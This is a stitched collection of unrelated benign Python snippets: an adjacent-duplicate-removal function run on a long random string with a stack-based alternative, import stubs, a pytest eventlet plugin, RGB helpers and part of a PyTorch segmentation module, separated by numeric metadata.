def removeDuplicates(s: str) -> str: i = 0 while i < len(s)-1: if s[i] == s[i+1]: s = s[i+2:] if s==0 else s[:i]+s[i+2:] i = 0 if i==0 else i-1 else: i+=1 return s print(removeDuplicates("gnyogdbncigrwnjjtqtyregqyhkinjxgzmkpxskloxjcensflhhxlpfkrcmuctrrqahjlmziiupsenyaagbamdkxgqswexvffjygshlkcvdmjypmpduactfnlezrltjirqntomjomkkjdotvlfjafboajhklqvboluugoorigqswfzblnzqmxrootnudnqenmtffuzhallvqmlvmhvulbasxmbtfytqrpdxthbfezwfmaenimwnjhxjhtncyhmlazjjlqxtavunztuhhxduzbwnunjeiorsjnqqtkpoomfpoomshvaolvhkaeldunxvaheorqjjsvbxijmeftlsglnijdfgnpeisacakcyogdvwaeanzinmzecqzptmaqymdtcnctdyqukzxjjoqgllpyzmoaqdbiurwgdnxzaavdvjfoplymjkhzailvdqoohdrwihokdxzfqnnpsccfwfappvpozccxfefflqpstzzxvjpgdwenirlsxfkcstwvuatmturxgczkriaalhoqylrnrullmqajxrxvmkeyrcogpjwralyvxhdinhsfeksbwdtywbdnmucgdukrcltsjqehvkbhqmhvarpupvgwxqydnbrvmxmqlddaqvalnewursnrvlcofejwjryexpvglkyjkrgigpewxdbfoacmnxjqzqumtjmyjcmnukfotapbfybhnnbgtnyvneoiiiabqonoqaykrtopgdvcnwcfhqeamvbwzgmzrjegszfzgxfasgvicxqxmllgvhqzypaapfrjrmgrwdpcvfgdgkmkwmlyymybryxyunjzglpfqbwhihtsvujejryntmqldlgtegkwxmzwfqjexuiznzycstunbzpcfrlmocijwoclexdzdkkgeflesklphhsqteplpscgsjhfrmxmwstpljhsvcqyuscnvuadidyprjqyoygvgwozqigmxtstoetsfjvvdpmmfbfnpijjybxquvfaxsfrzlecwboqqlqbffhqaynmfhfbanspotydwtdllbolveyjwrkrvnpcdmgtsikrfylusoyyqrpglmviwqzebuoxslildwbjlimytbsvrypkwgdqdcwxkbtlvklhiwhytbqycipvtuiuebszihybdrzpobnszrdhdltnnrbqbvqxjrpltvxydhmwbwswkgxzrpupoxhtdercsvhkizpjwqlqtncvyufaxtjdznojtvbplgfzgtuvrtuujfhxcxupddmduklodecnxtlgszswmowszfrqakrqnsvnvipyadbruuknkijpphdtbkxveyijdoaflwdetbagvqhksabyapmvlufeftzfkvxzrhasuianvslpfcikzrdvghokiwntuouiadysnghymcyvnworaecsffciwsmrxzcsopmifigkxbqmdsgtelajmgabzxgsqqtanmkebcpwudwwsmtfaqrxiyohfymgqcifgyvydqtpvzbrhwhntnhwrflrrayknllojkdijbbupaklzvpzlxofjiidyllitjtgxfvhxzhxbngdjvbamlouxrtfzgtfqyuthhlhiiwropqlsxazzqcjpomvwctotidohpaavhvuiwljdzeycjasacdedxpdlkxkqukhueicdxdzrbgpagenspiyuguowbmsydcxfldnfdstyqeacyrdbrbicepwevbhugzecqengmpadgkksqyycnqeilfyomjtmyulgavbogsibfoajcoqsblehgvivoibhkwuulvzawebjbusbpnthtidkgivptcwqgeealdmmsfzdlsksqyvfogzxirsyupfphvndljblgiklherznezjoqratdpaubvdicijbqiemtcfjghzxkbrryttfhpusfbkhmgmmoexltbhsoflpqdmwvhpgzkdqwpszznjimvlwhmwqpinnorgjpptpwxpwgagtubszwvgiczsfzwrmvrjwvwupapsiolbzbjitxjedfyughkzpkhujvkahsxyblsewzanydmzwlgmjvftwmsbjecdosfikvhjrqqhxmehavbyeemteuqvgoxjkpgvgrlabpypckbkkoqfauyuqojtmxmyzwgtxfgxqoxaahzpkbrbtuymrgdxmrfqmwbrpjnkqzdolptzcwmnvjxkbdahyytikvvbandzfhjjbaogoxxfyjbraqjjmoyiibmfterpaxrkreymmtpfjvztgquwbxkxrvfkegvaxwktzhvfrykrvsyrixjpfrbmzcoszektofgdpdfvqsbjfygregsygkhdfndqhoijkzloradgzbwjpnavwzdrnvptsdgfmapqmhaoakadjybfqgorzcnkaojmcotombnchjdskxavyrjtpwcjgaoilcyvqalofltksjildedotsitktyzenywwvtttuyimlnbtoxlazvmjiwvvdeikdzmuitdbxufvtdmypsunrpdnqxfcobdkfvsojfwnifscjcvypndgbyjqntwfxflyktjbpjqsnfkqpbwuahoyhgeoouulkbcnfkqlxqfynefjkwitpsmnsrhficxzcyobzodyvrvskzqeivwytfpjnqmmiuyvvzsmuqyqkolvaccbyqixtbljwhisxilhadwqejoazilbizmuzyolnfpvxfguikclbsdsgpdtezexgcrlbkkpgnftwtqtdfztkhwxwbhwlcxeinmsiiivskkrjpvznuukjzxiyajbpduurpakyigieabqdiopchzechzllywazexaqiegwmldblzylsxahzspbgwnvfklluljgolyztuonjxxhpwkyuykafgvparuerfyynxygqhtelsildgeqvcsxkmpteyotadxwnxcybayrlgvtkmlsaxcoalarzbvgbonaafidquicefrcrytzgqgxosduscpilmbbrlnriyrfsracyctdmunsmzoytixvdgrroyfapjwztamzurqwcdcbqmwvhorwtjukxjbhktvwmqhysoyvcwzzprewkgmjcfdhhohgimpzltltzxinlpukbcaevgghltiwnlbozzfitkxncpjjminjzjrhvxbgvfcuzfcpsdlcklxmbdfafqixwlmfyuckxdoyeqceiqqxysygjdlwrzkiqwihaqotvacvuadhwlfcpgazbpahgmxhqnbjuuwnkdrbtypuboeiwendakeejucjudqjwvbuqfemilgvytqsjismxlgrqltwekymjlyqzeqpjhdgacklbsfyspxnqxcyqzvqmgihhuhpbavrhdpkjqmvusvkemobcmmmuostueklvejcoyqmsjlgiuzzypvxjlvskzlkntyaiip
psurcowvrnymwukxazmfnurbjgidyjzbgmqwjcfmnssdebzkavddltmsooxgbczfjhpiammeuhnzqdushgcadvluimeysgtjyznyqqqmenmadaborhcncuqutravcrthhfmthsbicnfevimbpbishsrraksjwlvdwonecuvoeevmyhmtxstkvlxenpmkkygiiyqzfrsvpxrpflpccnzvnqnbexajvciibqkhzvizcgvwnetisxyailxkrxjkkoankqyigyrmjclaqrzxyffkzcnnfhwgqgmiwpkjtgnjwvohconiugobjtnxpevvvqsxtrvhbdmmjjltkxlfkselygkyjkbkktzwqadejsgxwsqhxrjgsgmqxmlwnqbotshysrhyqpxqbiqlyzxanxcqwryaeadjjhlbpgwrfixaialnjtplrgxiafbslmjmblexbuczzllrkivtjoyinaxhdaxeklkakwgtifpdnepryvqekumvhvkqwqdhvxnmxivhsosiwhbfysmdenpcyqvjfgldyfiusdxtliiprkkdvmdzwcmgkitpbsxoyzucuijiljjgvopispzuwtltkidxsybztgyczzsgvudyvvwejqqdqjatodzltqucgnstoemxcotgqdvdrzytddqamurevcpndikbsrfhgiitwrzpaecookkciybfvwmodedewgofydbfqfgwuhyjuhskdpdtujducgoxogjfsouqkhkfplnvoqywnwnonrltolbgzjohdxlwobucbuwghkdulemgryelbclvwkwijlsyrlzocybrqhcfmpovcbmfvfikegaqpdzkpvbfmkezlxpseeisbnwncjlolumwzikksrkxhfkllyureidpmmrtkkvkjbumdnmpxitrlxqlktwrtqdgatdazmqrztrmvknijwormqebfgnfbbncfggmzfvfkzsexmyrxrcvuipjulrmgwvmejztilytfjjyhuutslzhpwasosxqoothdspqinvbjhgrrzbbbmzedhdwfzihznptdggxgflqaiavtctifhlcshebkfajbcdxwngkikdzytddbebzayrphmmobhvvaodgntojbhvaemxzffwqpdmsqjoujbhxjoasbayfpdgjfulvfcrgwslnyqyqdmzfhxvufcotpzdwyhxqsisvonqgsplgsxqogblheybufdwddutmsyfuvfjgyccrfgawhzqejocwjguihzdvyfzeaimvtcdcjqrzcuwzvqrgjrdhjpnfkppprgqvgpivfikpdzkkjkgtusrvujdxltvsrhchzcgdvucnzzyskwdntywzqbwzzarwirgxmokhdixuoqrxhexmsbytnrcfkpxyldalbkqauihsxlcrbqjzzobwsensohnqprzxusmewymtkdfcolfhwxqippmksmlrnlfqlhrenldnjzxqdrtjjygcwqbdhtqicpkqwhmdevlsgmobqosqjmpffoeixbxxrhvrumebtgimhiijhtdrppzhiuhrunmrvzbswlzgvymmgqwihuoflwwhaywajadpfzojkjhdncqtrfpaqqfagvwcntbkdqhzkciwlapkomodmqyxwtquypbbjdefmezkerketzctzdoiislfmleaufovnpabwychebmvxlnkjsfybfuoxsoomxgioiomzauwaspldxwrntkvawlcovclrkfonxdvkazqtzazsanoqwzozlyryyotdxxaiosmfugkrgclmxbvvscmlgbpqmluctdvicyhirqmfvcblaaattivahnrxhhfgxccklbrcbvlbkjwpultvhathockapgjhtrkfrdqrreantgyishlmqmwxubmyxvjdmelwatuqgticskxchgzfueeglpizljgqwdwcowuvmeufsscdgljkobyqikworwzgddwdasgwehoxxcvdxykualubmrzhtwvvrpnburqtuygvzjuypuojbcuaiqidfywduhpuyqfksxzooadifrokqjxmrpqmdmakpbnswdhtfzmxsivqeervgfzyrmyftnoxauluiiecabgmoquqtywzwgkltrgzygxeuphhpgydtyxnobwfornvqitfcwatqjnogpteroweniwnkeehkgnahxaaqsdgvwbltozxewnqblchuacnkpzjxgvaoywrufaseezukagdoabsqmihrctxmcxgstcjsxvdxqzodlfezoegtwzkkoshhxcsfzkzbyclhhjfxzspjfewflnfyspwupkrvwyykgvzhwhabxpdofyaeryazdqfmlipwtlnlfadqnbwfnrqrzceigjrcbubuoonhywhcxajdclvpbnrjcxxbvgyyganyqszugltgonbynqzvqoflqkxwijvdemyobvbmkqctfbpmpcdxpwcmmbupmkefntdldjvrkqukotlebzwyenuajedcgwjrrcqhfktzvlysxbjpauhkjrfkvudtefkdxsaywuhqjbwybfcorchxdcleidjwafrqxlcmcmrxkmpzcazdgdlxyxoebzknsxrdsobttyncpgdxccoxhqmohiwwtqgflnedlavzisporhtbhzizggmwarrckwowcxhzyvjpbvbatduzrudsmezkhzfxchyizgsjwsllmplbtcdtotkzepwsrrddmwvpgwmwhqsnfkyhzmfhymzwhhvqgnixjsqtrxvrdjdbitwxrlnuovbwtqrtnqmauznxhqlsoylhtummzrkopngaelgmjzgsbotpndmimipiozinfxnskmqbuzjhwnmuoxwrngfrplzytzlzmfhvwgvcldmzmauvhhovriwzkixrmshtanxacgryjamqbsfakxynmlylqgirberwaaaaauczpsgscppglpndnnnqdlgospkypvafxiwspkhsobxgvsemqvtmpsluigwmdwqipzrkeyawxxplibsenftdymuavxvnxuutqvzwjbezzgrlpzmpmvjfyudcbqdjhkrmhykjoaiywqvnzrhfihenbwlenwibzldkyrsdqfrcfrlgkbkkscceohmlobydzsphyoitoaoexrdcqjsfkopecyywgazzfftugzykmtymuurwikeoivibpfwtxvekpidkbgrnqkgdwvyofxpnxihgrpahtkwlackzawblhhevosqpodrcxnljqikojnpmhonbogxnvszqlxmrfpjkiwcbsflawkejxnnhtdtzxpnmhdggshhrgapvptobkkogamtdpzeuskdhiyuhkeysxbktqneiqmfksxklqrxfozpakjjmiiqwljdmkgqzgwssqbpjsiqzmumpiynjuwknkdozxicwcdliabidlovhqpkcpjbnwprjnvxxlqzbfcisxxvtltolvslqrgsjqlibhtmlzppcfqriyovojwliqlgyybyrkopnhxfmwtliozuvfjwovqyjhayojbnlkegveqoahwdnpdnaxcbzrnjlqmmlvprejbbjpytaizkjdsalkvsjkxhhohlhkpasg
kkdsnvbnwaiwzlaeryuuorxevqwqfevlegfnavetxgykukwoazrjkzimbecpllxuoeonnfcdekzurlphocsqfwhvidekpojgongdguzzkxshfcygxmtwfxvynrgwoursradnecinkuzhctelpyecxsxlqhstgpqfwkbfxsumxcmczkdopgxbbytegpqbimjpwfcyloenxgluiturfokzalymywqdemncrajozxnyrdgyulacxgmmktpagkrpsdmfbvublbwkouexgoclqozuvgzshudfscnlufbclkbkrubjfrbnhpxxnszcyifmsdykbocwocvqoytozfkgwmeiczobuvwrucfjelntebzblroiqsbteocdptimlcjcuwecbfgrbpwnqmasbrtlyeqezyesnszbjnjnvzabwylchplvadoklzwykazdlambaixczmdhteioflodvscdzrwgedapbvjcbdulvlvqulgbbahxlojejzgavpkfviutyklsmfrcjruljtgtvlifosigvsvybmjbcpfcbxybdqpdkmndcjyyefbjnymfuwvwevhqryoqqfcwwkqwnngjcorpqyealbdqiwktlqkwmuhcckaqtqdspcpcuoshjypfvvcjzmcfcanblrbwpacejfefcjlpcbcqyuisngcjmqhueuliyacwpuztjgunhbetupfpetfhmiskwwygwptpsemeebvvrkumzwkbwshptbhudoctvbidokgwdfvfsxsxzoialdhxlivaztakzteqkfncwzzqxixigjpqjxusexlqdcanidqxtvmktzgvzmqpbkygnoifholvuiimnbrmgduttnlqzyjdksmlcodwerzmnwkkaqhafjtuarcyvxwgvnchvqihbwbhhmsrhifspkaoqvkgdnuktbtdytdnqzifkhxoxqeetbiconkkfwmtsyhkegyuuqikntnhcoblfbljmpbgobskezlqicxmvxwgxzskdalreybmwcafktnuuzcvkuqqhohzejqyqalqxngkprtwrocrafpovbnzlgwpvktxrszdspmstqnlicnokqdcoolftqwifelogwwncnmaustpmexrpqqbvssqfkucwfmsbxjpszqjpysnsvmwbdnchrodyzubnwrptbefojsjeehhyifyqnjrpwbfodhjrhytnfpvzwbwhxqzpblgindehlhinkozsupqrbptortjglaimblyizcbgxxoknpdhpjlrpkdntftgw"))
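The removeDuplicates function above deletes one adjacent equal pair at a time and rescans from (near) the start, which is quadratic in the worst case; note also that its `s == 0` test is always false for a string (presumably `i == 0` was meant, though both branches happen to produce the same slice when i is 0). The standard linear-time version of the same task uses a stack; a sketch for comparison:

def remove_duplicates_stack(s: str) -> str:
    """Remove adjacent duplicate pairs in one pass using a stack."""
    stack = []
    for ch in s:
        if stack and stack[-1] == ch:
            stack.pop()  # ch cancels the previous character
        else:
            stack.append(ch)
    return "".join(stack)

# e.g. remove_duplicates_stack("abbaca") == "ca"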
704.333333
8,219
0.982134
47
8,452
176.617021
0.319149
0.001205
0.000723
0.000964
0
0
0
0
0
0
0
0.001198
0.012186
8,452
11
8,220
768.363636
0.993053
0
0
0
0
0
0.969238
0.969238
0
1
0
0
0
1
0.1
false
0
0
0
0.2
0.1
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
bb28f7ec80ef51c0ffa3ad8fac04c259d92c2d12
260
py
Python
models/__init__.py
pgmikhael/MLExperiments
d3613a70e537ea5aaa0453ddaa76938c32637c49
[ "MIT" ]
null
null
null
models/__init__.py
pgmikhael/MLExperiments
d3613a70e537ea5aaa0453ddaa76938c32637c49
[ "MIT" ]
null
null
null
models/__init__.py
pgmikhael/MLExperiments
d3613a70e537ea5aaa0453ddaa76938c32637c49
[ "MIT" ]
null
null
null
from models.trained_models import Resnet18
from models.trained_models import AlexNet
from models.trained_models import VGG16
from models.trained_models import DenseNet161
from models.trained_models import Inception_v3
from models.alexnet import Vanilla_AlexNet
43.333333
46
0.888462
37
260
6.054054
0.297297
0.267857
0.379464
0.513393
0.647321
0
0
0
0
0
0
0.033755
0.088462
260
6
47
43.333333
0.911392
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
24738f3028f23e2c6f3e2d3909704cf38e1fd6c6
40
py
Python
src/nodes/corenodes/adjust/brightness_contrast_node/__init__.py
Correct-Syntax/GimelStudio
db6e2db35730e11bcb25f5ba82823e68b86003f1
[ "Apache-2.0" ]
134
2021-02-27T08:28:09.000Z
2022-03-30T17:46:27.000Z
src/nodes/corenodes/adjust/brightness_contrast_node/__init__.py
Correct-Syntax/GimelStudio
db6e2db35730e11bcb25f5ba82823e68b86003f1
[ "Apache-2.0" ]
127
2021-04-13T13:34:20.000Z
2022-02-14T21:16:12.000Z
src/nodes/corenodes/adjust/brightness_contrast_node/__init__.py
Correct-Syntax/GimelStudio
db6e2db35730e11bcb25f5ba82823e68b86003f1
[ "Apache-2.0" ]
20
2021-03-23T20:06:05.000Z
2022-01-20T18:24:53.000Z
from .brightness_contrast_node import *
20
39
0.85
5
40
6.4
1
0
0
0
0
0
0
0
0
0
0
0
0.1
40
1
40
40
0.888889
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
700f4850abe57d50058b8c652917b8d7bb495949
95
py
Python
graphmodels/inference/__init__.py
DLunin/pygraphmodels
4ea8ebed74f3a7d5d56af4d5f189a514aab420f9
[ "MIT" ]
null
null
null
graphmodels/inference/__init__.py
DLunin/pygraphmodels
4ea8ebed74f3a7d5d56af4d5f189a514aab420f9
[ "MIT" ]
null
null
null
graphmodels/inference/__init__.py
DLunin/pygraphmodels
4ea8ebed74f3a7d5d56af4d5f189a514aab420f9
[ "MIT" ]
null
null
null
from .inference import InferenceStrategy, SumProductInference, NaiveInference, random_ordering
47.5
94
0.884211
8
95
10.375
1
0
0
0
0
0
0
0
0
0
0
0
0.073684
95
1
95
95
0.943182
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7065952138eb4401a0c0aa9c75d0634225525f9b
165
py
Python
pytest_eventlet/plugin.py
nameko/pytest-eventlet
5860d3e919cd499fd120ad32b8fe34a535fd95e2
[ "Apache-2.0" ]
null
null
null
pytest_eventlet/plugin.py
nameko/pytest-eventlet
5860d3e919cd499fd120ad32b8fe34a535fd95e2
[ "Apache-2.0" ]
null
null
null
pytest_eventlet/plugin.py
nameko/pytest-eventlet
5860d3e919cd499fd120ad32b8fe34a535fd95e2
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*-


def pytest_load_initial_conftests():
    # make sure we monkey_patch before local conftests
    import eventlet
    eventlet.monkey_patch()
23.571429
54
0.715152
21
165
5.380952
0.809524
0.19469
0
0
0
0
0
0
0
0
0
0.007463
0.187879
165
6
55
27.5
0.835821
0.424242
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
6
7072c12cae7043cdd5c66711119c5fd1d8675caf
159
py
Python
fastcord/utils/color.py
dskprt/botnolib
dd17aff956df0a54838980257249a7dfb725ab23
[ "MIT" ]
3
2020-03-17T13:08:42.000Z
2021-07-07T10:58:04.000Z
fastcord/utils/color.py
dskprt/botnolib
dd17aff956df0a54838980257249a7dfb725ab23
[ "MIT" ]
1
2020-04-07T12:46:09.000Z
2020-04-07T12:46:09.000Z
fastcord/utils/color.py
dskprt/botnolib
dd17aff956df0a54838980257249a7dfb725ab23
[ "MIT" ]
1
2020-04-12T17:37:32.000Z
2020-04-12T17:37:32.000Z
def int_from_rgb(r, g, b):
    return (r << 16) + (g << 8) + b


def rgb_from_int(color):
    return ((color >> 16) & 255), ((color >> 8) & 255), (color & 255)
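A quick round-trip check of the two helpers (the values are arbitrary):

color = int_from_rgb(255, 128, 0)
assert color == 0xFF8000            # 255 << 16 | 128 << 8 | 0
assert rgb_from_int(color) == (255, 128, 0)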
26.5
69
0.522013
27
159
2.925926
0.444444
0.202532
0
0
0
0
0
0
0
0
0
0.125
0.245283
159
5
70
31.8
0.533333
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
7079f165c0da30c2f8bc2b267d56315a885599c8
258
py
Python
import-from-dir/otherfiles/Misc.py
brenordv/python-snippets
aa69d4d64f7b9cea958ad852248210f4e869fe50
[ "MIT" ]
2
2020-04-10T21:20:22.000Z
2021-01-17T19:28:32.000Z
import-from-dir/otherfiles/Misc.py
brenordv/python-snippets
aa69d4d64f7b9cea958ad852248210f4e869fe50
[ "MIT" ]
null
null
null
import-from-dir/otherfiles/Misc.py
brenordv/python-snippets
aa69d4d64f7b9cea958ad852248210f4e869fe50
[ "MIT" ]
2
2020-07-20T20:24:01.000Z
2022-02-27T15:40:40.000Z
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Misc.py: Just a sample file with a function.

This material is part of this post:
http://raccoon.ninja/pt/dev-pt/python-importando-todos-os-arquivos-de-um-diretorio/
"""


def hey_ho():
    return "Let's go!"
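The blog post the docstring cites covers importing every module from a directory. One common way to do that from a package's __init__.py is via pkgutil; this is a generic sketch under that assumption, not code taken from the post:

import importlib
import pkgutil

# Inside a package's __init__.py, import every sibling module so that
# files like Misc.py are loaded automatically.
for _finder, module_name, _is_pkg in pkgutil.iter_modules(__path__):
    importlib.import_module("." + module_name, package=__name__)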
21.5
83
0.678295
44
258
3.954545
0.909091
0
0
0
0
0
0
0
0
0
0
0.004505
0.139535
258
12
84
21.5
0.779279
0.802326
0
0
0
0
0.214286
0
0
0
0
0.083333
0
1
0.5
true
0
0
0.5
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
1
0
0
1
1
0
0
1
1
0
0
6
709245c54b2fc2d5807e7e673098113b160a8c0b
30
py
Python
RST/ODSAextensions/odsa/extrtoolembed/__init__.py
dwgillies/OpenDSA
e012925896070a86bd7c3a4cbb75fa5682d9b9e2
[ "MIT" ]
200
2015-02-08T05:27:52.000Z
2022-03-23T02:44:38.000Z
RST/ODSAextensions/odsa/extrtoolembed/__init__.py
dwgillies/OpenDSA
e012925896070a86bd7c3a4cbb75fa5682d9b9e2
[ "MIT" ]
119
2015-03-22T22:38:21.000Z
2022-03-15T04:38:52.000Z
RST/ODSAextensions/odsa/extrtoolembed/__init__.py
dwgillies/OpenDSA
e012925896070a86bd7c3a4cbb75fa5682d9b9e2
[ "MIT" ]
105
2015-01-03T08:55:00.000Z
2022-03-19T00:51:45.000Z
from .extrtoolembed import *
10
28
0.766667
3
30
7.666667
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
30
2
29
15
0.92
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
5689760c0527699177f621ddf2b82ac355cf773f
39,782
py
Python
build/lib/nn_common_modules/modules.py
jyotirmay123/nn-common-modules
014de12c68330c434e90989099f3af77067484ad
[ "MIT" ]
null
null
null
build/lib/nn_common_modules/modules.py
jyotirmay123/nn-common-modules
014de12c68330c434e90989099f3af77067484ad
[ "MIT" ]
null
null
null
build/lib/nn_common_modules/modules.py
jyotirmay123/nn-common-modules
014de12c68330c434e90989099f3af77067484ad
[ "MIT" ]
null
null
null
""" Description ++++++++++++++++++++++ Building blocks of segmentation neural network Usage ++++++++++++++++++++++ Import the package and Instantiate any module/block class you want to you:: from nn_common_modules import modules as additional_modules dense_block = additional_modules.DenseBlock(params, se_block_type = 'SSE') Members ++++++++++++++++++++++ """ import torch import torch.nn as nn from squeeze_and_excitation import squeeze_and_excitation as se import torch.nn.functional as F import torch.distributions as tdist class DenseBlock(nn.Module): """Block with dense connections :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tonsor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DenseBlock, self).__init__() if se_block_type == se.SELayer.CSE.value: self.SELayer = se.ChannelSELayer(params['num_filters']) elif se_block_type == se.SELayer.SSE.value: self.SELayer = se.SpatialSELayer(params['num_filters']) elif se_block_type == se.SELayer.CSSE.value: self.SELayer = se.ChannelSpatialSELayer(params['num_filters']) else: self.SELayer = None padding_h = int((params['kernel_h'] - 1) / 2) padding_w = int((params['kernel_w'] - 1) / 2) conv1_out_size = int(params['num_channels'] + params['num_filters']) conv2_out_size = int( params['num_channels'] + params['num_filters'] + params['num_filters']) self.conv1 = nn.Conv2d(in_channels=params['num_channels'], out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv2 = nn.Conv2d(in_channels=conv1_out_size, out_channels=params['num_filters'], kernel_size=( params['kernel_h'], params['kernel_w']), padding=(padding_h, padding_w), stride=params['stride_conv']) self.conv3 = nn.Conv2d(in_channels=conv2_out_size, out_channels=params['num_filters'], kernel_size=(1, 1), padding=(0, 0), stride=params['stride_conv']) self.batchnorm1 = nn.BatchNorm2d(num_features=params['num_channels']) self.batchnorm2 = nn.BatchNorm2d(num_features=conv1_out_size) self.batchnorm3 = nn.BatchNorm2d(num_features=conv2_out_size) self.prelu = nn.PReLU() if params['drop_out'] > 0: self.drop_out_needed = True self.drop_out = nn.Dropout2d(params['drop_out']) else: self.drop_out_needed = False def forward(self, input): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ o1 = self.batchnorm1(input) o2 = self.prelu(o1) o3 = self.conv1(o2) o4 = torch.cat((input, o3), dim=1) o5 = self.batchnorm2(o4) o6 = self.prelu(o5) o7 = self.conv2(o6) o8 = torch.cat((input, o3, o7), dim=1) o9 = self.batchnorm3(o8) o10 = self.prelu(o9) out = self.conv3(o10) return out class EncoderBlock(DenseBlock): """Dense encoder block with maxpool and an optional SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are 
{'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ def __init__(self, params, se_block_type=None): super(EncoderBlock, self).__init__(params, se_block_type=se_block_type) self.maxpool = nn.MaxPool2d( kernel_size=params['pool'], stride=params['stride_pool'], return_indices=True) def forward(self, input, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: output tensor with maxpool, output tensor without maxpool, indices for unpooling :rtype: torch.tensor [FloatTensor], torch.tensor [FloatTensor], torch.tensor [LongTensor] """ out_block = super(EncoderBlock, self).forward(input) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) out_encoder, indices = self.maxpool(out_block) return out_encoder, out_block, indices class DecoderBlock(DenseBlock): """Dense decoder block with maxunpool and an optional skip connections and SE block :param params: { 'num_channels':1, 'num_filters':64, 'kernel_h':5, 'kernel_w':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :param se_block_type: Squeeze and Excite block type to be included, defaults to None :type se_block_type: str, valid options are {'NONE', 'CSE', 'SSE', 'CSSE'}, optional :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params, se_block_type=None): super(DecoderBlock, self).__init__(params, se_block_type=se_block_type) self.unpool = nn.MaxUnpool2d( kernel_size=params['pool'], stride=params['stride_pool']) def forward(self, input, out_block=None, indices=None, weights=None): """Forward pass :param input: Input tensor, shape = (N x C x H x W) :type input: torch.tensor [FloatTensor] :param out_block: Tensor for skip connection, shape = (N x C x H x W), defaults to None :type out_block: torch.tensor [FloatTensor], optional :param indices: Indices used for unpooling operation, defaults to None :type indices: torch.tensor, optional :param weights: Weights used for squeeze and excitation, shape depends on the type of SE block, defaults to None :type weights: torch.tensor, optional :return: Forward passed tensor :rtype: torch.tensor [FloatTensor] """ if indices is not None: unpool = self.unpool(input, indices) else: # TODO: Implement Conv Transpose print("You have to use Conv Transpose") if out_block is not None: concat = torch.cat((out_block, unpool), dim=1) else: concat = unpool out_block = super(DecoderBlock, self).forward(concat) if self.SELayer: out_block = self.SELayer(out_block, weights) if self.drop_out_needed: out_block = self.drop_out(out_block) return out_block class ClassifierBlock(nn.Module): """ Last layer :param params: { 'num_channels':1, 'num_filters':64, 'kernel_c':5, 'stride_conv':1, 'pool':2, 'stride_pool':2, 'num_classes':28, 'se_block': se.SELayer.None, 'drop_out':0,2} :type params: dict :return: forward passed tensor :rtype: torch.tensor [FloatTensor] """ def __init__(self, params): super(ClassifierBlock, self).__init__() self.conv = nn.Conv2d( params['num_channels'], params['num_class'], params['kernel_c'], params['stride_conv']) def 
